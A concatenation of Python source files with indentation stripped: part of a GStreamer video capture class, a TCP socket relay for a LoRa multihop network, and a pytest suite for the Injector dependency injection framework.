self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.cap.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.protocol != Protocol.V4L2:
# format conversion for hardware decoder
cvt_pipeline = (
'nvvidconv interpolation-method=5 ! '
'video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx !'
'videoconvert ! appsink sync=false'
% self.size
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=(int)%d, height=(int)%d !'
'videoconvert ! appsink sync=false'
% self.size
)
if self.protocol == Protocol.FILE:
pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=(int)%d, height=(int)%d, '
'format=(string)NV12, framerate=(fraction)%d/1 ! '
% (
self.input_uri[6:],
*self.camera_size,
self.camera_fps
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=(int)%d, height=(int)%d, '
'format=(string)YUY2, framerate=(fraction)%d/1 ! '
% (
self.input_uri,
*self.camera_size,
self.camera_fps
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.protocol == Protocol.RTSP:
pipeline = 'rtspsrc location=%s latency=0 ! decodebin ! ' % self.input_uri
return pipeline + cvt_pipeline
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
# use hardware encoder if found
if 'omxh264enc' in gst_elements:
h264_encoder = 'omxh264enc'
elif 'x264enc' in gst_elements:
h264_encoder = 'x264enc'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
pipeline = (
'appsrc ! autovideoconvert ! %s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
return pipeline
def _capture_frames(self):
while not self.exit_event.is_set():
ret, frame = self.cap.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# keep unprocessed frames in the buffer for video file
if self.protocol == Protocol.FILE:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
pos = uri.find('://')
if '/dev/video' in uri:
protocol = Protocol.V4L2
elif uri[:pos] == 'csi':
protocol = Protocol.CSI
elif uri[:pos] == 'rtsp':
protocol = Protocol.RTSP
else:
protocol = Protocol.FILE
return protocol
|
local_network.py
|
import socket
import threading
import time
from queue import Queue
from lora_multihop import serial_connection
class LocalNetwork:
def __init__(self, port, module_address, host=None):
self.host = host
self.port = port
self.module_address = module_address
self.send_queue = Queue()
self.send_queue_second_client = Queue()
self.sending_queue_inserter_thread = None
self.server_socket_thread = None
self.tcp_communication_running = False
self.socket = None
self.connection_list = []
def start_send_receive_threads(self, is_server=True):
self.tcp_communication_running = True
sending_thread = threading.Thread(target=self.start_sending)
sending_thread.start()
if is_server:
connection_listener_thread = threading.Thread(target=self.waiting_for_connections)
connection_listener_thread.start()
else:
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.connect((self.host, self.port))
self.socket.setblocking(False)
self.connection_list.append(self.socket)
t = threading.Thread(target=self.start_receiving, args=(self.socket,))
t.start()
def waiting_for_connections(self):
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setblocking(False)
self.socket.bind(("", self.port))
self.socket.listen(2)
while self.tcp_communication_running:
try:
conn, addr = self.socket.accept()
conn.setblocking(False)
self.connection_list.append(conn)
t = threading.Thread(target=self.start_receiving, args=(conn,))
t.start()
except socket.error:
pass
print('stop waiting for incoming connections')
def start_receiving(self, connection):
while self.tcp_communication_running:
try:
data = connection.recv(1024)
if data:
print(f'data: {data}')
serial_connection.response_q.put(data.decode())
except socket.error:
time.sleep(0.2)
print('receiving thread stopped')
def start_sending(self):
while self.tcp_communication_running:
while not serial_connection.writing_q.empty():
payload = serial_connection.writing_q.get()[0]
if 'AT' not in payload:
message_to_send = serial_connection.str_to_bytes(f'LR,{self.module_address},10,'+ payload)
for connection in self.connection_list:
connection.send(message_to_send)
serial_connection.status_q.put(True)
time.sleep(0.5)
print('sending thread stopped')
def stop_local_consumer_producer(self):
self.tcp_communication_running = False
self.socket.close()
|
injector_test.py
|
# encoding: utf-8
#
# Copyright (C) 2010 Alec Thomas <[email protected]>
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.
#
# Author: Alec Thomas <[email protected]>
"""Functional tests for the "Injector" dependency injection framework."""
from contextlib import contextmanager
from typing import Any, NewType
import abc
import sys
import threading
import traceback
import warnings
from typing import Dict, List, NewType
import pytest
from injector import (
Binder,
CallError,
Injector,
Scope,
InstanceProvider,
ClassProvider,
get_bindings,
inject,
multiprovider,
noninjectable,
singleton,
threadlocal,
UnsatisfiedRequirement,
CircularDependency,
Module,
SingletonScope,
ScopeDecorator,
AssistedBuilder,
provider,
ProviderOf,
ClassAssistedBuilder,
Error,
UnknownArgument,
HAVE_ANNOTATED,
)
if HAVE_ANNOTATED:
from injector import Inject, NoInject
class EmptyClass:
pass
class DependsOnEmptyClass:
@inject
def __init__(self, b: EmptyClass):
"""Construct a new DependsOnEmptyClass."""
self.b = b
def prepare_nested_injectors():
def configure(binder):
binder.bind(str, to='asd')
parent = Injector(configure)
child = parent.create_child_injector()
return parent, child
def check_exception_contains_stuff(exception, stuff):
stringified = str(exception)
for thing in stuff:
assert thing in stringified, '%r should be present in the exception representation: %s' % (
thing,
stringified,
)
def test_child_injector_inherits_parent_bindings():
parent, child = prepare_nested_injectors()
assert child.get(str) == parent.get(str)
def test_child_injector_overrides_parent_bindings():
parent, child = prepare_nested_injectors()
child.binder.bind(str, to='qwe')
assert (parent.get(str), child.get(str)) == ('asd', 'qwe')
def test_child_injector_rebinds_arguments_for_parent_scope():
class Cls:
val = ""
class A(Cls):
@inject
def __init__(self, val: str):
self.val = val
def configure_parent(binder):
binder.bind(Cls, to=A)
binder.bind(str, to="Parent")
def configure_child(binder):
binder.bind(str, to="Child")
parent = Injector(configure_parent)
assert parent.get(Cls).val == "Parent"
child = parent.create_child_injector(configure_child)
assert child.get(Cls).val == "Child"
def test_scopes_are_only_bound_to_root_injector():
parent, child = prepare_nested_injectors()
class A:
pass
parent.binder.bind(A, to=A, scope=singleton)
assert parent.get(A) is child.get(A)
def test_get_default_injected_instances():
def configure(binder):
binder.bind(DependsOnEmptyClass)
binder.bind(EmptyClass)
injector = Injector(configure)
assert injector.get(Injector) is injector
assert injector.get(Binder) is injector.binder
def test_instantiate_injected_method():
a = DependsOnEmptyClass('Bob')
assert a.b == 'Bob'
def test_method_decorator_is_wrapped():
assert DependsOnEmptyClass.__init__.__doc__ == 'Construct a new DependsOnEmptyClass.'
assert DependsOnEmptyClass.__init__.__name__ == '__init__'
def test_decorator_works_for_function_with_no_args():
@inject
def wrapped(*args, **kwargs):
pass
def test_providers_arent_called_for_dependencies_that_are_already_provided():
def configure(binder):
binder.bind(int, to=lambda: 1 / 0)
class A:
@inject
def __init__(self, i: int):
pass
injector = Injector(configure)
builder = injector.get(AssistedBuilder[A])
with pytest.raises(ZeroDivisionError):
builder.build()
builder.build(i=3)
def test_inject_direct():
def configure(binder):
binder.bind(DependsOnEmptyClass)
binder.bind(EmptyClass)
injector = Injector(configure)
a = injector.get(DependsOnEmptyClass)
assert isinstance(a, DependsOnEmptyClass)
assert isinstance(a.b, EmptyClass)
def test_configure_multiple_modules():
def configure_a(binder):
binder.bind(DependsOnEmptyClass)
def configure_b(binder):
binder.bind(EmptyClass)
injector = Injector([configure_a, configure_b])
a = injector.get(DependsOnEmptyClass)
assert isinstance(a, DependsOnEmptyClass)
assert isinstance(a.b, EmptyClass)
def test_inject_with_missing_dependency():
def configure(binder):
binder.bind(DependsOnEmptyClass)
injector = Injector(configure, auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(EmptyClass)
def test_inject_named_interface():
class A:
@inject
def __init__(self, b: EmptyClass):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(EmptyClass)
injector = Injector(configure)
a = injector.get(A)
assert isinstance(a, A)
assert isinstance(a.b, EmptyClass)
class TransitiveC:
pass
class TransitiveB:
@inject
def __init__(self, c: TransitiveC):
self.c = c
class TransitiveA:
@inject
def __init__(self, b: TransitiveB):
self.b = b
def test_transitive_injection():
def configure(binder):
binder.bind(TransitiveA)
binder.bind(TransitiveB)
binder.bind(TransitiveC)
injector = Injector(configure)
a = injector.get(TransitiveA)
assert isinstance(a, TransitiveA)
assert isinstance(a.b, TransitiveB)
assert isinstance(a.b.c, TransitiveC)
def test_transitive_injection_with_missing_dependency():
def configure(binder):
binder.bind(TransitiveA)
binder.bind(TransitiveB)
injector = Injector(configure, auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(TransitiveA)
with pytest.raises(UnsatisfiedRequirement):
injector.get(TransitiveB)
def test_inject_singleton():
class A:
@inject
def __init__(self, b: EmptyClass):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(EmptyClass, scope=SingletonScope)
injector1 = Injector(configure)
a1 = injector1.get(A)
a2 = injector1.get(A)
assert a1.b is a2.b
@singleton
class SingletonB:
pass
def test_inject_decorated_singleton_class():
class A:
@inject
def __init__(self, b: SingletonB):
self.b = b
def configure(binder):
binder.bind(A)
binder.bind(SingletonB)
injector1 = Injector(configure)
a1 = injector1.get(A)
a2 = injector1.get(A)
assert a1.b is a2.b
def test_threadlocal():
@threadlocal
class A:
def __init__(self):
pass
def configure(binder):
binder.bind(A)
injector = Injector(configure)
a1 = injector.get(A)
a2 = injector.get(A)
assert a1 is a2
a3 = [None]
ready = threading.Event()
def inject_a3():
a3[0] = injector.get(A)
ready.set()
threading.Thread(target=inject_a3).start()
ready.wait(1.0)
assert a2 is not a3[0] and a3[0] is not None
class Interface2:
pass
def test_injecting_interface_implementation():
class Implementation:
pass
class A:
@inject
def __init__(self, i: Interface2):
self.i = i
def configure(binder):
binder.bind(A)
binder.bind(Interface2, to=Implementation)
injector = Injector(configure)
a = injector.get(A)
assert isinstance(a.i, Implementation)
class CyclicInterface:
pass
class CyclicA:
@inject
def __init__(self, i: CyclicInterface):
self.i = i
class CyclicB:
@inject
def __init__(self, a: CyclicA):
self.a = a
def test_cyclic_dependencies():
def configure(binder):
binder.bind(CyclicInterface, to=CyclicB)
binder.bind(CyclicA)
injector = Injector(configure)
with pytest.raises(CircularDependency):
injector.get(CyclicA)
class CyclicInterface2:
pass
class CyclicA2:
@inject
def __init__(self, i: CyclicInterface2):
self.i = i
class CyclicB2:
@inject
def __init__(self, a_builder: AssistedBuilder[CyclicA2]):
self.a = a_builder.build(i=self)
def test_dependency_cycle_can_be_worked_broken_by_assisted_building():
def configure(binder):
binder.bind(CyclicInterface2, to=CyclicB2)
binder.bind(CyclicA2)
injector = Injector(configure)
# Previously it'd detect a circular dependency here:
# 1. Constructing CyclicA2 requires CyclicInterface2 (bound to CyclicB2)
# 2. Constructing CyclicB2 requires assisted build of CyclicA2
# 3. Constructing CyclicA2 triggers circular dependency check
assert isinstance(injector.get(CyclicA2), CyclicA2)
class Interface5:
constructed = False
def __init__(self):
Interface5.constructed = True
def test_that_injection_is_lazy():
class A:
@inject
def __init__(self, i: Interface5):
self.i = i
def configure(binder):
binder.bind(Interface5)
binder.bind(A)
injector = Injector(configure)
assert not (Interface5.constructed)
injector.get(A)
assert Interface5.constructed
def test_module_provider():
class MyModule(Module):
@provider
def provide_name(self) -> str:
return 'Bob'
module = MyModule()
injector = Injector(module)
assert injector.get(str) == 'Bob'
def test_module_class_gets_instantiated():
name = 'Meg'
class MyModule(Module):
def configure(self, binder):
binder.bind(str, to=name)
injector = Injector(MyModule)
assert injector.get(str) == name
def test_inject_and_provide_coexist_happily():
class MyModule(Module):
@provider
def provide_weight(self) -> float:
return 50.0
@provider
def provide_age(self) -> int:
return 25
# TODO(alec) Make provider/inject order independent.
@provider
@inject
def provide_description(self, age: int, weight: float) -> str:
return 'Bob is %d and weighs %0.1fkg' % (age, weight)
assert Injector(MyModule()).get(str) == 'Bob is 25 and weighs 50.0kg'
Names = NewType('Names', List[str])
Passwords = NewType('Ages', Dict[str, str])
def test_multibind():
# First let's have some explicit multibindings
def configure(binder):
binder.multibind(List[str], to=['not a name'])
binder.multibind(Dict[str, str], to={'asd': 'qwe'})
# To make sure Lists and Dicts of different subtypes are treated distinctly
binder.multibind(List[int], to=[1, 2, 3])
binder.multibind(Dict[str, int], to={'weight': 12})
# To see that NewTypes are treated distinctly
binder.multibind(Names, to=['Bob'])
binder.multibind(Passwords, to={'Bob': 'password1'})
# Then @multiprovider-decorated Module methods
class CustomModule(Module):
@multiprovider
def provide_some_ints(self) -> List[int]:
return [4, 5, 6]
@multiprovider
def provide_some_strs(self) -> List[str]:
return ['not a name either']
@multiprovider
def provide_str_to_str_mapping(self) -> Dict[str, str]:
return {'xxx': 'yyy'}
@multiprovider
def provide_str_to_int_mapping(self) -> Dict[str, int]:
return {'height': 33}
@multiprovider
def provide_names(self) -> Names:
return ['Alice', 'Clarice']
@multiprovider
def provide_passwords(self) -> Passwords:
return {'Alice': 'aojrioeg3', 'Clarice': 'clarice30'}
injector = Injector([configure, CustomModule])
assert injector.get(List[str]) == ['not a name', 'not a name either']
assert injector.get(List[int]) == [1, 2, 3, 4, 5, 6]
assert injector.get(Dict[str, str]) == {'asd': 'qwe', 'xxx': 'yyy'}
assert injector.get(Dict[str, int]) == {'weight': 12, 'height': 33}
assert injector.get(Names) == ['Bob', 'Alice', 'Clarice']
assert injector.get(Passwords) == {'Bob': 'password1', 'Alice': 'aojrioeg3', 'Clarice': 'clarice30'}
def test_regular_bind_and_provider_dont_work_with_multibind():
# We only want multibind and multiprovider to work to avoid confusion
Names = NewType('Names', List[str])
Passwords = NewType('Passwords', Dict[str, str])
class MyModule(Module):
with pytest.raises(Error):
@provider
def provide_strs(self) -> List[str]:
return []
with pytest.raises(Error):
@provider
def provide_names(self) -> Names:
return []
with pytest.raises(Error):
@provider
def provide_strs_in_dict(self) -> Dict[str, str]:
return {}
with pytest.raises(Error):
@provider
def provide_passwords(self) -> Passwords:
return {}
injector = Injector()
binder = injector.binder
with pytest.raises(Error):
binder.bind(List[str], to=[])
with pytest.raises(Error):
binder.bind(Names, to=[])
with pytest.raises(Error):
binder.bind(Dict[str, str], to={})
with pytest.raises(Error):
binder.bind(Passwords, to={})
def test_auto_bind():
class A:
pass
injector = Injector()
assert isinstance(injector.get(A), A)
def test_auto_bind_with_newtype():
# Reported in https://github.com/alecthomas/injector/issues/117
class A:
pass
AliasOfA = NewType('AliasOfA', A)
injector = Injector()
assert isinstance(injector.get(AliasOfA), A)
class Request:
pass
class RequestScope(Scope):
def configure(self):
self.context = None
@contextmanager
def __call__(self, request):
assert self.context is None
self.context = {}
binder = self.injector.get(Binder)
binder.bind(Request, to=request, scope=RequestScope)
yield
self.context = None
def get(self, key, provider):
if self.context is None:
raise UnsatisfiedRequirement(None, key)
try:
return self.context[key]
except KeyError:
provider = InstanceProvider(provider.get(self.injector))
self.context[key] = provider
return provider
request = ScopeDecorator(RequestScope)
@request
class Handler:
def __init__(self, request):
self.request = request
class RequestModule(Module):
@provider
@inject
def handler(self, request: Request) -> Handler:
return Handler(request)
def test_custom_scope():
injector = Injector([RequestModule()], auto_bind=False)
with pytest.raises(UnsatisfiedRequirement):
injector.get(Handler)
scope = injector.get(RequestScope)
request = Request()
with scope(request):
handler = injector.get(Handler)
assert handler.request is request
with pytest.raises(UnsatisfiedRequirement):
injector.get(Handler)
def test_binder_install():
class ModuleA(Module):
def configure(self, binder):
binder.bind(str, to='hello world')
class ModuleB(Module):
def configure(self, binder):
binder.install(ModuleA())
injector = Injector([ModuleB()])
assert injector.get(str) == 'hello world'
def test_binder_provider_for_method_with_explicit_provider():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int, to=InstanceProvider(1))
assert type(provider) is InstanceProvider
assert provider.get(injector) == 1
def test_binder_provider_for_method_with_instance():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int, to=1)
assert type(provider) is InstanceProvider
assert provider.get(injector) == 1
def test_binder_provider_for_method_with_class():
injector = Injector()
binder = injector.binder
provider = binder.provider_for(int)
assert type(provider) is ClassProvider
assert provider.get(injector) == 0
def test_binder_provider_for_method_with_class_to_specific_subclass():
class A:
pass
class B(A):
pass
injector = Injector()
binder = injector.binder
provider = binder.provider_for(A, B)
assert type(provider) is ClassProvider
assert isinstance(provider.get(injector), B)
def test_binder_provider_for_type_with_metaclass():
# use a metaclass cross python2/3 way
# otherwise should be:
# class A(object, metaclass=abc.ABCMeta):
# passa
A = abc.ABCMeta('A', (object,), {})
injector = Injector()
binder = injector.binder
assert isinstance(binder.provider_for(A, None).get(injector), A)
class ClassA:
def __init__(self, parameter):
pass
class ClassB:
@inject
def __init__(self, a: ClassA):
pass
def test_injecting_undecorated_class_with_missing_dependencies_raises_the_right_error():
injector = Injector()
try:
injector.get(ClassB)
except CallError as ce:
check_exception_contains_stuff(ce, ('ClassA.__init__', 'ClassB'))
def test_call_to_method_with_legitimate_call_error_raises_type_error():
class A:
def __init__(self):
max()
injector = Injector()
with pytest.raises(TypeError):
injector.get(A)
def test_call_error_str_representation_handles_single_arg():
ce = CallError('zxc')
assert str(ce) == 'zxc'
class NeedsAssistance:
@inject
def __init__(self, a: str, b):
self.a = a
self.b = b
def test_assisted_builder_works_when_got_directly_from_injector():
injector = Injector()
builder = injector.get(AssistedBuilder[NeedsAssistance])
obj = builder.build(b=123)
assert (obj.a, obj.b) == (str(), 123)
def test_assisted_builder_works_when_injected():
class X:
@inject
def __init__(self, builder: AssistedBuilder[NeedsAssistance]):
self.obj = builder.build(b=234)
injector = Injector()
x = injector.get(X)
assert (x.obj.a, x.obj.b) == (str(), 234)
class Interface:
b = 0
def test_assisted_builder_uses_bindings():
def configure(binder):
binder.bind(Interface, to=NeedsAssistance)
injector = Injector(configure)
builder = injector.get(AssistedBuilder[Interface])
x = builder.build(b=333)
assert (type(x), x.b) == (NeedsAssistance, 333)
def test_assisted_builder_uses_concrete_class_when_specified():
class X:
pass
def configure(binder):
# meant only to show that provider isn't called
binder.bind(X, to=lambda: 1 / 0)
injector = Injector(configure)
builder = injector.get(ClassAssistedBuilder[X])
builder.build()
def test_assisted_builder_injection_is_safe_to_use_with_multiple_injectors():
class X:
@inject
def __init__(self, builder: AssistedBuilder[NeedsAssistance]):
self.builder = builder
i1, i2 = Injector(), Injector()
b1 = i1.get(X).builder
b2 = i2.get(X).builder
assert (b1._injector, b2._injector) == (i1, i2)
class TestThreadSafety:
def setup(self):
self.event = threading.Event()
def configure(binder):
binder.bind(str, to=lambda: self.event.wait() and 'this is str')
class XXX:
@inject
def __init__(self, s: str):
pass
self.injector = Injector(configure)
self.cls = XXX
def gather_results(self, count):
objects = []
lock = threading.Lock()
def target():
o = self.injector.get(self.cls)
with lock:
objects.append(o)
threads = [threading.Thread(target=target) for i in range(count)]
for t in threads:
t.start()
self.event.set()
for t in threads:
t.join()
return objects
def test_injection_is_thread_safe(self):
objects = self.gather_results(2)
assert len(objects) == 2
def test_singleton_scope_is_thread_safe(self):
self.injector.binder.bind(self.cls, scope=singleton)
a, b = self.gather_results(2)
assert a is b
def test_provider_and_scope_decorator_collaboration():
@provider
@singleton
def provider_singleton() -> int:
return 10
@singleton
@provider
def singleton_provider() -> int:
return 10
assert provider_singleton.__binding__.scope == SingletonScope
assert singleton_provider.__binding__.scope == SingletonScope
def test_injecting_into_method_of_object_that_is_falseish_works():
# regression test
class X(dict):
@inject
def __init__(self, s: str):
pass
injector = Injector()
injector.get(X)
Name = NewType("Name", str)
Message = NewType("Message", str)
def test_callable_provider_injection():
@inject
def create_message(name: Name):
return "Hello, " + name
def configure(binder):
binder.bind(Name, to="John")
binder.bind(Message, to=create_message)
injector = Injector([configure])
msg = injector.get(Message)
assert msg == "Hello, John"
def test_providerof():
counter = [0]
def provide_str():
counter[0] += 1
return 'content'
def configure(binder):
binder.bind(str, to=provide_str)
injector = Injector(configure)
assert counter[0] == 0
provider = injector.get(ProviderOf[str])
assert counter[0] == 0
assert provider.get() == 'content'
assert counter[0] == 1
assert provider.get() == injector.get(str)
assert counter[0] == 3
def test_providerof_cannot_be_bound():
def configure(binder):
binder.bind(ProviderOf[int], to=InstanceProvider(None))
with pytest.raises(Exception):
Injector(configure)
def test_providerof_is_safe_to_use_with_multiple_injectors():
def configure1(binder):
binder.bind(int, to=1)
def configure2(binder):
binder.bind(int, to=2)
injector1 = Injector(configure1)
injector2 = Injector(configure2)
provider_of = ProviderOf[int]
provider1 = injector1.get(provider_of)
provider2 = injector2.get(provider_of)
assert provider1.get() == 1
assert provider2.get() == 2
def test_special_interfaces_work_with_auto_bind_disabled():
class InjectMe:
pass
def configure(binder):
binder.bind(InjectMe, to=InstanceProvider(InjectMe()))
injector = Injector(configure, auto_bind=False)
# This line used to fail with:
# Traceback (most recent call last):
# File "/projects/injector/injector_test.py", line 1171,
# in test_auto_bind_disabled_regressions
# injector.get(ProviderOf(InjectMe))
# File "/projects/injector/injector.py", line 687, in get
# binding = self.binder.get_binding(None, key)
# File "/projects/injector/injector.py", line 459, in get_binding
# raise UnsatisfiedRequirement(cls, key)
# UnsatisfiedRequirement: unsatisfied requirement on
# <injector.ProviderOf object at 0x10ff01550>
injector.get(ProviderOf[InjectMe])
# This used to fail with an error similar to the ProviderOf one
injector.get(ClassAssistedBuilder[InjectMe])
def test_binding_an_instance_regression():
text = b'hello'.decode()
def configure(binder):
# Yes, this binding doesn't make sense strictly speaking but
# it's just a sample case.
binder.bind(bytes, to=text)
injector = Injector(configure)
# This used to return empty bytes instead of the expected string
assert injector.get(bytes) == text
class PartialB:
@inject
def __init__(self, a: EmptyClass, b: str):
self.a = a
self.b = b
def test_class_assisted_builder_of_partially_injected_class_old():
class C:
@inject
def __init__(self, a: EmptyClass, builder: ClassAssistedBuilder[PartialB]):
self.a = a
self.b = builder.build(b='C')
c = Injector().get(C)
assert isinstance(c, C)
assert isinstance(c.b, PartialB)
assert isinstance(c.b.a, EmptyClass)
class ImplicitA:
pass
class ImplicitB:
@inject
def __init__(self, a: ImplicitA):
self.a = a
class ImplicitC:
@inject
def __init__(self, b: ImplicitB):
self.b = b
def test_implicit_injection_for_python3():
injector = Injector()
c = injector.get(ImplicitC)
assert isinstance(c, ImplicitC)
assert isinstance(c.b, ImplicitB)
assert isinstance(c.b.a, ImplicitA)
def test_annotation_based_injection_works_in_provider_methods():
class MyModule(Module):
def configure(self, binder):
binder.bind(int, to=42)
@provider
def provide_str(self, i: int) -> str:
return str(i)
@singleton
@provider
def provide_object(self) -> object:
return object()
injector = Injector(MyModule)
assert injector.get(str) == '42'
assert injector.get(object) is injector.get(object)
class Fetcher:
def fetch(self, user_id):
assert user_id == 333
return {'name': 'John'}
class Processor:
@noninjectable('provider_id')
@inject
@noninjectable('user_id')
def __init__(self, fetcher: Fetcher, user_id: int, provider_id: str):
assert provider_id == 'not injected'
data = fetcher.fetch(user_id)
self.name = data['name']
def test_assisted_building_is_supported():
def configure(binder):
binder.bind(int, to=897)
binder.bind(str, to='injected')
injector = Injector(configure)
processor_builder = injector.get(AssistedBuilder[Processor])
with pytest.raises(CallError):
processor_builder.build()
processor = processor_builder.build(user_id=333, provider_id='not injected')
assert processor.name == 'John'
def test_raises_when_noninjectable_arguments_defined_with_invalid_arguments():
with pytest.raises(UnknownArgument):
class A:
@inject
@noninjectable('c')
def __init__(self, b: str):
self.b = b
def test_can_create_instance_with_untyped_noninjectable_argument():
class Parent:
@inject
@noninjectable('child1', 'child2')
def __init__(self, child1, *, child2):
self.child1 = child1
self.child2 = child2
injector = Injector()
parent_builder = injector.get(AssistedBuilder[Parent])
parent = parent_builder.build(child1='injected1', child2='injected2')
assert parent.child1 == 'injected1'
assert parent.child2 == 'injected2'
def test_implicit_injection_fails_when_annotations_are_missing():
class A:
def __init__(self, n):
self.n = n
injector = Injector()
with pytest.raises(CallError):
injector.get(A)
def test_injection_works_in_presence_of_return_value_annotation():
# Code with PEP 484-compatible type hints will have __init__ methods
# annotated as returning None[1] and this didn't work well with Injector.
#
# [1] https://www.python.org/dev/peps/pep-0484/#the-meaning-of-annotations
class A:
@inject
def __init__(self, s: str) -> None:
self.s = s
def configure(binder):
binder.bind(str, to='this is string')
injector = Injector([configure])
# Used to fail with:
# injector.UnknownProvider: couldn't determine provider for None to None
a = injector.get(A)
# Just a sanity check, if the code above worked we're almost certain
# we're good but just in case the return value annotation handling changed
# something:
assert a.s == 'this is string'
def test_things_dont_break_in_presence_of_args_or_kwargs():
class A:
@inject
def __init__(self, s: str, *args: int, **kwargs: str):
assert not args
assert not kwargs
injector = Injector()
# The following line used to fail with something like this:
# Traceback (most recent call last):
# File "/ve/injector/injector_test_py3.py", line 192,
# in test_things_dont_break_in_presence_of_args_or_kwargs
# injector.get(A)
# File "/ve/injector/injector.py", line 707, in get
# result = scope_instance.get(key, binding.provider).get(self)
# File "/ve/injector/injector.py", line 142, in get
# return injector.create_object(self._cls)
# File "/ve/injector/injector.py", line 744, in create_object
# init(instance, **additional_kwargs)
# File "/ve/injector/injector.py", line 1082, in inject
# kwargs=kwargs
# File "/ve/injector/injector.py", line 851, in call_with_injection
# **dependencies)
# File "/ve/injector/injector_test_py3.py", line 189, in __init__
# assert not kwargs
# AssertionError: assert not {'args': 0, 'kwargs': ''}
injector.get(A)
def test_forward_references_in_annotations_are_handled():
# See https://www.python.org/dev/peps/pep-0484/#forward-references for details
class CustomModule(Module):
@provider
def provide_x(self) -> 'X':
return X('hello')
@inject
def fun(s: 'X') -> 'X':
return s
# The class needs to be module-global in order for the string -> object
# resolution mechanism to work. I could make it work with locals but it
# doesn't seem worth it.
global X
class X:
def __init__(self, message: str) -> None:
self.message = message
try:
injector = Injector(CustomModule)
assert injector.call_with_injection(fun).message == 'hello'
finally:
del X
def test_more_useful_exception_is_raised_when_parameters_type_is_any():
@inject
def fun(a: Any) -> None:
pass
injector = Injector()
# This was the exception before:
#
# TypeError: Cannot instantiate <class 'typing.AnyMeta'>
#
# Now:
#
# injector.CallError: Call to AnyMeta.__new__() failed: Cannot instantiate
# <class 'typing.AnyMeta'> (injection stack: ['injector_test_py3'])
#
# In this case the injection stack doesn't provide too much information but
# it quickly gets helpful when the stack gets deeper.
with pytest.raises((CallError, TypeError)):
injector.call_with_injection(fun)
def test_optionals_are_ignored_for_now():
@inject
def fun(s: str = None):
return s
assert Injector().call_with_injection(fun) == ''
def test_explicitly_passed_parameters_override_injectable_values():
# The class needs to be defined globally for the 'X' forward reference to be able to be resolved.
global X
# We test a method on top of regular function to exercise the code path that's
# responsible for handling methods.
class X:
@inject
def method(self, s: str) -> str:
return s
@inject
def method_typed_self(self: 'X', s: str) -> str:
return s
@inject
def function(s: str) -> str:
return s
injection_counter = 0
def provide_str() -> str:
nonlocal injection_counter
injection_counter += 1
return 'injected string'
def configure(binder: Binder) -> None:
binder.bind(str, to=provide_str)
injector = Injector([configure])
x = X()
try:
assert injection_counter == 0
assert injector.call_with_injection(x.method) == 'injected string'
assert injection_counter == 1
assert injector.call_with_injection(x.method_typed_self) == 'injected string'
assert injection_counter == 2
assert injector.call_with_injection(function) == 'injected string'
assert injection_counter == 3
assert injector.call_with_injection(x.method, args=('passed string',)) == 'passed string'
assert injection_counter == 3
assert injector.call_with_injection(x.method_typed_self, args=('passed string',)) == 'passed string'
assert injection_counter == 3
assert injector.call_with_injection(function, args=('passed string',)) == 'passed string'
assert injection_counter == 3
assert injector.call_with_injection(x.method, kwargs={'s': 'passed string'}) == 'passed string'
assert injection_counter == 3
assert (
injector.call_with_injection(x.method_typed_self, kwargs={'s': 'passed string'})
== 'passed string'
)
assert injection_counter == 3
assert injector.call_with_injection(function, kwargs={'s': 'passed string'}) == 'passed string'
assert injection_counter == 3
finally:
del X
class AssistedB:
@inject
def __init__(self, a: EmptyClass, b: str):
self.a = a
self.b = b
def test_class_assisted_builder_of_partially_injected_class():
class C:
@inject
def __init__(self, a: EmptyClass, builder: ClassAssistedBuilder[AssistedB]):
self.a = a
self.b = builder.build(b='C')
c = Injector().get(C)
assert isinstance(c, C)
assert isinstance(c.b, AssistedB)
assert isinstance(c.b.a, EmptyClass)
# The test taken from Alec Thomas' pull request: https://github.com/alecthomas/injector/pull/73
def test_child_scope():
TestKey = NewType('TestKey', str)
TestKey2 = NewType('TestKey2', str)
def parent_module(binder):
binder.bind(TestKey, to='in parent', scope=singleton)
def first_child_module(binder):
binder.bind(TestKey2, to='in first child', scope=singleton)
def second_child_module(binder):
binder.bind(TestKey2, to='in second child', scope=singleton)
injector = Injector(modules=[parent_module])
first_child_injector = injector.create_child_injector(modules=[first_child_module])
second_child_injector = injector.create_child_injector(modules=[second_child_module])
assert first_child_injector.get(TestKey) is first_child_injector.get(TestKey)
assert first_child_injector.get(TestKey) is second_child_injector.get(TestKey)
assert first_child_injector.get(TestKey2) is not second_child_injector.get(TestKey2)
def test_custom_scopes_work_as_expected_with_child_injectors():
class CustomSingletonScope(SingletonScope):
pass
custom_singleton = ScopeDecorator(CustomSingletonScope)
def parent_module(binder):
binder.bind(str, to='parent value', scope=custom_singleton)
def child_module(binder):
binder.bind(str, to='child value', scope=custom_singleton)
parent = Injector(modules=[parent_module])
child = parent.create_child_injector(modules=[child_module])
print('parent, child: %s, %s' % (parent, child))
assert parent.get(str) == 'parent value'
assert child.get(str) == 'child value'
# Test for https://github.com/alecthomas/injector/issues/75
